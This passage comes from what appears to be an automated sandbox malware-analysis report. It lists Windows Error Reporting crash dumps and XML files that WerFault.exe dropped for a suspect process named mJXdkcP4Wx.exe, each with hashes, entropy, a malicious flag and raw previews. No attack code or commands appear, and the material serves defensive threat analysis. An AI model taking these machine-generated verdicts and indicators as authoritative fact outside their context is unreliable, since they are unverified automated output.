                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.7.9.6.8.4.4.7.9.8.1.4.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.2.4.6.3.3.e.f.-.b.f.b.f.-.4.1.f.d.-.8.2.0.d.-.7.0.b.1.2.4.c.c.9.1.8.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.9.e.1.b.d.2.8.-.4.f.1.6.-.4.9.6.1.-.a.4.e.8.-.2.1.0.d.0.1.0.c.9.2.1.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.J.X.d.k.c.P.4.W.x...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.a.8.-.0.0.0.1.-.0.0.1.4.-.f.6.e.5.-.e.b.d.2.a.1.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.1.a.9.4.f.8.8.c.b.0.2.1.9.3.b.b.c.b.b.e.2.f.6.0.e.b.6.c.0.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.b.c.e.b.2.f.7.6.5.a.a.d.9.1.2.e.a.1.e.1.e.3.d.3.2.4.f.2.1.5.b.a.e.c.e.7.f.c.b.5.!.m.J.X.d.k.c.P.4.W.x...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.0.:.5.4.:.0.7.!.0.!.m.J.X.d.k.c.P.4.W.x...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.8895525282493634
                                        Encrypted:false
                                        SSDEEP:192:R0VBhIXs056rgjuSZr+3zuiFwZ24IO8+c:R0VBhIX56rgjO3zuiFwY4IO8+c
                                        MD5:6BD9BFD0C769C7875950F9B04D9FA24D
                                        SHA1:1C2961EEDC257CB34E87BE4EF2FC23B3B9864FFE
                                        SHA-256:94138283FD146371417984723234104A29B09F2ADACC3B9170D59DE212D79EA0
                                        SHA-512:BCF3A2839F0261CC1402793FD9F60BD231D8FF20EEC4363DC4971D5F32B54120F436529421AC48875B77839FCA2782C858C945B4F6BAF0FCA5FB3BE7C6DEADDB
                                        Malicious:true
                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.7.9.6.8.3.6.8.4.1.1.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.1.c.7.2.6.e.3.-.c.1.3.7.-.4.2.b.0.-.8.c.9.a.-.3.3.2.1.4.6.f.8.7.6.d.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.1.7.5.0.d.1.-.0.a.c.c.-.4.2.1.0.-.8.e.7.a.-.d.d.5.a.e.4.6.a.1.1.e.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.J.X.d.k.c.P.4.W.x...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.a.8.-.0.0.0.1.-.0.0.1.4.-.f.6.e.5.-.e.b.d.2.a.1.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.1.a.9.4.f.8.8.c.b.0.2.1.9.3.b.b.c.b.b.e.2.f.6.0.e.b.6.c.0.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.b.c.e.b.2.f.7.6.5.a.a.d.9.1.2.e.a.1.e.1.e.3.d.3.2.4.f.2.1.5.b.a.e.c.e.7.f.c.b.5.!.m.J.X.d.k.c.P.4.W.x...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.0.:.5.4.:.0.7.!.0.!.m.J.X.d.k.c.P.4.W.x...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 16:48:01 2024, 0x1205a4 type
                                        Category:dropped
                                        Size (bytes):85424
                                        Entropy (8bit):1.8219968202188
                                        Encrypted:false
                                        SSDEEP:384:+jXR0V1o/AEWeH2uo3HjePiURcCF9MQiNZQYVP8shRNnbbKqnXAAkN6UK:uqVK/AEWq2uoaPOCF9ApP8ezbKqnL8
                                        MD5:EEE28FF9019BE7E2ECEBBA05BA643A7B
                                        SHA1:390D66FDCEA157022545002144E99D9409CAA655
                                        SHA-256:8657E88ABEAF19642CA5A68563849C7C6A7B49D7B9739026517CE34DE170B7CE
                                        SHA-512:AA7870B4B1D4B3024A9DD3C2848286FB33E6A67C71D8AC5ECB458B61B9A1951D5993A9EA143461D6A8EF572E5BE627F060D96F93C4A550F0D40FC764BB55526C
                                        Malicious:false
                                        Preview:MDMP..a..... .......Ab.g.........................................0..........T.......8...........T................-......................................................................................................eJ......d.......GenuineIntel............T...........;b.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):8442
                                        Entropy (8bit):3.702889274914131
                                        Encrypted:false
                                        SSDEEP:192:R6l7wVeJBA6Yn6YEI7SU9qqgmfI9mpBC89bNzsfTvm:R6lXJm6Yn6YE0SU9qqgmfGiNYfC
                                        MD5:84C24B7588C5D356AAD802D85CB8C697
                                        SHA1:17181F8229E875A3C5392599317E5F4FC63ED6B0
                                        SHA-256:6D8FADEAEF36F3ED83BBC490DB63805FC006DB9FC1373884B1E42083A8E1C3A5
                                        SHA-512:78A7AB8FC547650EDF6425B7B9A3DD2027954982AAB6BF9B75DAED9B02434EE1DD1612E220BC88EA8AE3961CD83EA084DABF4D89B3903CE16F12461D02F4E078
                                        Malicious:false
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.9.6.<./.P.i.
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4720
                                        Entropy (8bit):4.485428248457072
                                        Encrypted:false
                                        SSDEEP:48:cvIwWl8zs2Jg77aI93wnWpW8VY3Ym8M4JLFWHFv+q8v4WWqhtN91tdd:uIjfMI79wW7VPJLFiK4FqhtN91tdd
                                        MD5:0F3BC3D2BBAC98F31C70DCE3DE9ED71E
                                        SHA1:50962E9070A1C830363EE3B5EEACD387A9D38BCE
                                        SHA-256:D633B950640E112AEE3A2F5CDFB13148004F51544277C929D61D705662A18284
                                        SHA-512:4EC953982E13A2B85F520D43356D0057BDD984CF4D0914CD36DF79D6BC85284BA8EB839464CD8386322B663938A849113A263F6B40BEB22D35F1F2701D5E6EE8
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534710" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 16:48:02 2024, 0x1205a4 type
                                        Category:dropped
                                        Size (bytes):85316
                                        Entropy (8bit):1.8458703614095686
                                        Encrypted:false
                                        SSDEEP:768:RVKtAEDV1ScaL5ICFP5P8ezbKqnLmGn4:RweFtJ8sGqnyG
                                        MD5:73ED3DBBF9CAE009716B1D2F081CEF81
                                        SHA1:E800CC049E0BB87429D4CD5D4EEBCB60677B514E
                                        SHA-256:C2C0B819ECA6DA8C4F77E36A6E2AB8B63A908B917B4739ED08648E13E372574F
                                        SHA-512:B28B617D62F2C7D02F9B7041A42D7449F5792597F603FAEE9965F00AE6F730CDDC3137236E31A85A00FF79088212162769C8DE193A807273F54BF2F1B77D7E6A
                                        Malicious:false
                                        Preview:MDMP..a..... .......Bb.g.........................................0..........T.......8...........T...........h ...,......................................................................................................eJ......d.......GenuineIntel............T...........;b.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):8440
                                        Entropy (8bit):3.70142334473985
                                        Encrypted:false
                                        SSDEEP:192:R6l7wVeJBo6+6YEInpSU9c4xgmfI9mpBT89b2zsfrSm:R6lXJu6+6YEYpSU9c4xgmfGV2Yff
                                        MD5:6A76A0586582B265749D836AC573BB11
                                        SHA1:97D227A89A1F6C7179A2E2F4F2E8F3E8755421AD
                                        SHA-256:595C1839B2EA51B975D4F2AF13464F490A4B6845EE67B45B648C7BC776AA0EE4
                                        SHA-512:2FD809BF4D0150355AB03961F6CEE54D6186F016522D32CA13985EEAD9C71F8B8C574610D44B48A6050255615185BAC953443A55B091602D5549010BBC75AD0B
                                        Malicious:false
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.9.6.<./.P.i.
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4720
                                        Entropy (8bit):4.4859364529269214
                                        Encrypted:false
                                        SSDEEP:48:cvIwWl8zs2Jg77aI93wnWpW8VY2Ym8M4JLFWHFH4+q8v4WWqhtN91tdd:uIjfMI79wW7VSJLFdK4FqhtN91tdd
                                        MD5:35FC5DCC834DFDBB2A48088F4E302C31
                                        SHA1:F65718EDB41040B75E37291F837217106259D05E
                                        SHA-256:859AB5E123462BDD27BBE6C5D14F07C49ECB8C8861F24D2F4A0EB8C621216EBB
                                        SHA-512:AE4A094F4DBA2E60C2F9F97A37B4B557C57938C173BC652DE45AFB2A29AE2EA0C3870122CA2E691E1FD9F7D467D5325E0F9AC4BB0032E663826BC3AB9E788FA4
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534710" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 16:48:03 2024, 0x1205a4 type
                                        Category:dropped
                                        Size (bytes):94988
                                        Entropy (8bit):1.6933722628451016
                                        Encrypted:false
                                        SSDEEP:384:oJCLiU2BoAEPy8zjetQURcCF+9RYWVIRnbbKqnXAAuCcBpZUVO2RNsRv:/LP2BoAEq8OtUCFAR5IBbKqnLeBpMsx
                                        MD5:8F8B8CD80F403936F86E0DCEB7A68983
                                        SHA1:7859205AC4BDEA7CCA235CAE7FC2731EEEBBEFB1
                                        SHA-256:2B2ED144D26FE96F6339D860C51F58A2EEE23C0062522E75C353CBCA1A0BD5EC
                                        SHA-512:953AB42C5483EB25AB15943D5AF388348F46EB76422B9E3BC9BEF8200624844384645D1189924CE983D8CFC73D6D1EC915EBEE8A0245E7E1BFF1DA1D4B6DD6D0
                                        Malicious:false
                                        Preview:MDMP..a..... .......Cb.g............T...............\............6..........T.......8...........T............!...Q..........@...........,...............................................................................eJ..............GenuineIntel............T...........;b.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):8440
                                        Entropy (8bit):3.7022430609704005
                                        Encrypted:false
                                        SSDEEP:192:R6l7wVeJBV6z6YEIKSU9FxgmfI9mpB089b/zsfBVm:R6lXJz6z6YEVSU9FxgmfGg/YfK
                                        MD5:5A0EEBFE3592C0625C9B481249598EF5
                                        SHA1:BCC2A5EC2F7A0900C20F5A62DF62FD758FCF5407
                                        SHA-256:B1D22945519518BEB06A747433655909FBCD018CF52C62C066A6CB2B295E1DFE
                                        SHA-512:CFF25B2AF22E08A09657BCCBACA78F3F9174AE5DCB314FCF3ED031B968606D7DAC431EF6C0A58AB357663ED8461801BCAF8D5C6EC19C3DE05D4B43EF729DBE9B
                                        Malicious:false
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.9.6.<./.P.i.
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4720
                                        Entropy (8bit):4.482736844538554
                                        Encrypted:false
                                        SSDEEP:48:cvIwWl8zs2Jg77aI93wnWpW8VY4Ym8M4JLFWHFUOI+q8v4WWqhtN91tdd:uIjfMI79wW7VQJLF5OIK4FqhtN91tdd
                                        MD5:CA0965F5F65FB108160565044CAA8A98
                                        SHA1:763DB8266CC413836C4D78A7E4F929355C59F0F1
                                        SHA-256:62A86608A154CCE36DD5A8263C0C0347E004BAD60807FFB8C343EBB5FBCF39FC
                                        SHA-512:3ABD78B95F49AE6C786FB322E6C6D40E2AE49444397C9681EECBC80FE0B2B0C980DE8AF6A30F8D86318992EAE47D35FD28E36A3DD43C669B58700EB3C140123C
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534710" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 16:48:04 2024, 0x1205a4 type
                                        Category:dropped
                                        Size (bytes):94564
                                        Entropy (8bit):1.7048855361805355
                                        Encrypted:false
                                        SSDEEP:768:AP2BAEvSO5vCFkWd0H5IBbKqnLcEs0kI8:eDOJgGqn/sRI8
                                        MD5:778D46488C671441845F840ADC563205
                                        SHA1:03804C12C383CECE532221FAF434B704DCDE73D1
                                        SHA-256:071E5CAE7629A5B6E4BAB668869F0EFC28D21DCF21B7B7B60AD520A8C6B57556
                                        SHA-512:650D8CDE8DD8B22772C0B8D457DEDDB44B1F8D4430BAD6AC76110AEE92A722D395C0B33DF7F6A9990EAE83B784DEEA2E959819A9B0C1084DEDE524F2737793AD
                                        Malicious:false
                                        Preview:MDMP..a..... .......Db.g............T...............\............6..........T.......8...........T............!..lO..........@...........,...............................................................................eJ..............GenuineIntel............T...........;b.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):8440
                                        Entropy (8bit):3.7031313464631936
                                        Encrypted:false
                                        SSDEEP:192:R6l7wVeJB46Yns6YEILSU9FxgmfI9mpBa89bgzsfdgm:R6lXJ+6J6YEESU9FxgmfGSgYfv
                                        MD5:A0175B0CDE292FF0EEA53BD8051F28A4
                                        SHA1:766500C14FE5E75106E183E31E3A76DEF8F0F540
                                        SHA-256:C1B4C64F110B29C651D22663C5F7859F9BE7A28AE21548FF92DC4A6C95F9D8AD
                                        SHA-512:C99E62FC617362423A84B130D68D4C38F11701369A29453F8DE56875AAB9EB02BA8C916A0116D8EB787D5B3B93E804C64A1F6DA6DA9E0D04B098A1A2AB20865B
                                        Malicious:false
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.9.6.<./.P.i.
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4720
                                        Entropy (8bit):4.484873293571453
                                        Encrypted:false
                                        SSDEEP:48:cvIwWl8zs2Jg77aI93wnWpW8VYxYm8M4JLFWHF2Mu+q8v4WWqhtN91tdd:uIjfMI79wW7VtJLF9K4FqhtN91tdd
                                        MD5:8B2B9940B9EB90256AD23193413AC22A
                                        SHA1:3BD12D01CB20EE313E86F0B15ECAC93087FC4433
                                        SHA-256:B77BBD1F69F890A1A950AD683D49A50595425279140FF5914D9287BD8E75DCE9
                                        SHA-512:4C6B76F1EE9CC6213E5A58BF24782E7B527D449005D03DD33D79F0D7F476C7CCFB54380E86C22DDF77C40C41713F970AE82C0AD1B3F3F3E65E94F12A881BC9F6
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534710" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 16:48:05 2024, 0x1205a4 type
                                        Category:dropped
                                        Size (bytes):101954
                                        Entropy (8bit):1.700545839103819
                                        Encrypted:false
                                        SSDEEP:384:CqxScuJRBAEyx/zCMD02e6MoUIcCF+iFYWVfcbKH1XAAc34wEHtHHhvo:4JRBAEGeMDK6MHCFNF5fcbKH1Lc6HHF
                                        MD5:E821C79564134EEB86FE564CFC1A17CA
                                        SHA1:F7793CAD16D6102A8D41969CAA3B51D08E3F1B98
                                        SHA-256:01CE8C9052B5715D1602CF38FBF7974E60B3FA992C5C95804733FE6463CC9435
                                        SHA-512:6E59183747946C5F485D5B305ED5B40802292B385AB19DA1DAF49B5601F8679768DD609C911204B005CB9E54EBF613A0A99768C76633396C4919943C6B1A926B
                                        Malicious:false
                                        Preview:MDMP..a..... .......Eb.g........................(...............f;..........T.......8...........T............*..*d......................................................................................................eJ......8.......GenuineIntel............T...........;b.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):8440
                                        Entropy (8bit):3.7031994166539075
                                        Encrypted:false
                                        SSDEEP:192:R6l7wVeJBF6+aQ6YEIOSU9FEgmfI9mpBP89bpzsfljm:R6lXJD6k6YEBSU9FEgmfGhpYfc
                                        MD5:EAED74AE0978E242CDC48AFA04E553D4
                                        SHA1:539DB4E69576C5B2D7D122CA8DB5B76067813D6F
                                        SHA-256:4168FA24C9CF3D0285E652136EF78B4E84525B9916F8D85A1CE0397B6F277FD1
